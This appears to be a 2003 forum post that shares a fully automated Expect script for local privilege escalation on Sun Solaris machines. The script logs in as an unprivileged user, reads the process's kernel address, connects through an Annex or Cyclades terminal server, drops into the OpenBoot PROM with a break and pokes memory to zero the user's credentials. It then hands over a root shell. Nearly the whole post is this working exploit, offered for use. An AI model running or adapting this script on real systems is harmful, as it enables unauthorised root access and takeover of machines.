Hi there, here is a fully automated script for getting a root shell using a normal user account and (remote-)console acces. The Script was written by me based on an article from phrack.com (article #53 - hacking forth by mudge) ---snip--- # # ---> consroot.exp <--- # by mickeyX 16.6.2003 # # connects to a SUN and a Terminalserver and hacks the OBP to get a root shell. # You need: # - a "normal" user account on a SUN # - terminalserveraccess on the same SUN # # this was tested on: # - MacOS X version 10.2.6 using expect 5.38.0 # - Solaris 8 using expect 5.25.0 # - ANNEX terminalservers # - CYCLADES terminalservers # # This is just a prototype ! Use with care on other terminalservers ! # # set timeout 2 set MODE [lindex $argv 0] set TARGET [lindex $argv 1] set UID [lindex $argv 2] set PW [lindex $argv 3] set CTYPE [lindex $argv 4] set TSERVER [lindex $argv 5] set TPORT [lindex $argv 6] set TPW [lindex $argv 7] set LOG log.txt proc usage {} { puts "\nusage: expect consroot < TERMINALSERVER> " puts "\twhere MODE is one of:" puts "\t\tT = Target is using TELNET" puts "\t\tS = Target is using SSH" puts "\tTARGET = machine to hack" puts "\tUSER = unprivileged user on target host" puts "\tPW = password on target host" puts "\n\twhere CONSOLETYPE is one of:" puts "\t\tA = Target is connected to Annex Terminalserver" puts "\t\tC = Target is connected to Cyclades Terminalserver\n" puts "\tTERMINALSERVER = consoleaccess for target host" puts "\tPORT = TCP/IP-port (!) on terminalserver where target is connected" puts "\tTPW = password for terminalserverport\n" exit 1 } ### # MAIN ### if { $argc < 8 } usage # check for Terminalservertypes... switch -- $CTYPE \ A { } C { } default usage # check for connect-Mode... switch -- $MODE \ T { spawn telnet $TARGET set main_session $spawn_id expect "ogin:" send "$UID\n" expect "assword" send "$PW\n" } S { spawn ssh -l $UID $TARGET set main_session $spawn_id expect "assword" send "$PW\n" } default usage # start korn-shell... 
expect { exp_continue } send "exec /usr/bin/ksh\n" # set defined prompt - so we can scan for it... send "export PS1=PROMPT:\n" # activate logging for getting credentials Adress... log_file -noappend $LOG ### # get adress for OBP-hacking: ### send "/usr/bin/ps -o addr -p $$\n" expect "ADDR" expect "PROMPT:" set ADRESS [exec sh "-c" "cat $LOG | grep -v PROMPT: | tail -1"] puts "\nReceived ADRESS from shell was: $ADRESS\n" ### ### ### # reset logfile... exec sh "-c" "1>$LOG" ### # get OS-architecture for OBP-hacking: ### send "/usr/bin/isainfo -b\n" expect "*" # clear expect buffer expect "PROMPT:" set ARC [exec sh "-c" "cat $LOG | tail -2 | head -1"] puts "\nReceived Architecture was: $ARC\n" exec "rm" "-f" "$LOG" ### ### ### # connect to Terminalserver... puts "\nPlease wait while connecting to Terminalserver...\n" spawn telnet -e "#" $TSERVER $TPORT switch -- $CTYPE \ A { puts "\nstarting Annex connect ...\n" expect "Port password" send "$TPW\n" expect "Permission granted" } C { puts "\nstarting Cyclades connect ...\n" expect "Port*:" send "$TPW\n" expect "Password:" send "$TPW\n" expect "*" } # hack OBP... send "#\n" expect "telnet" send "send brk\n" expect "ok" # let's ROCK and ROLL !!! switch -- $ARC \ 64 { send "hex 0 $ADRESS 20 + x@ 4 + l!\n" } 32 { send "hex 0 $ADRESS 14 + l@ 4 + l!\n" } expect "ok" send "go\r" # deactivate logging... log_file exec rm "-f" "$LOG" # give control to admin... set spawn_id $main_session send "\r" expect "PROMPT:" send "id\n" expect "PROMPT:" interact ---snip--- -- UNIX is like a wigwam: no windows, no gates, apache inside, stable. Windows is not the answer? it's the question. No is the answer.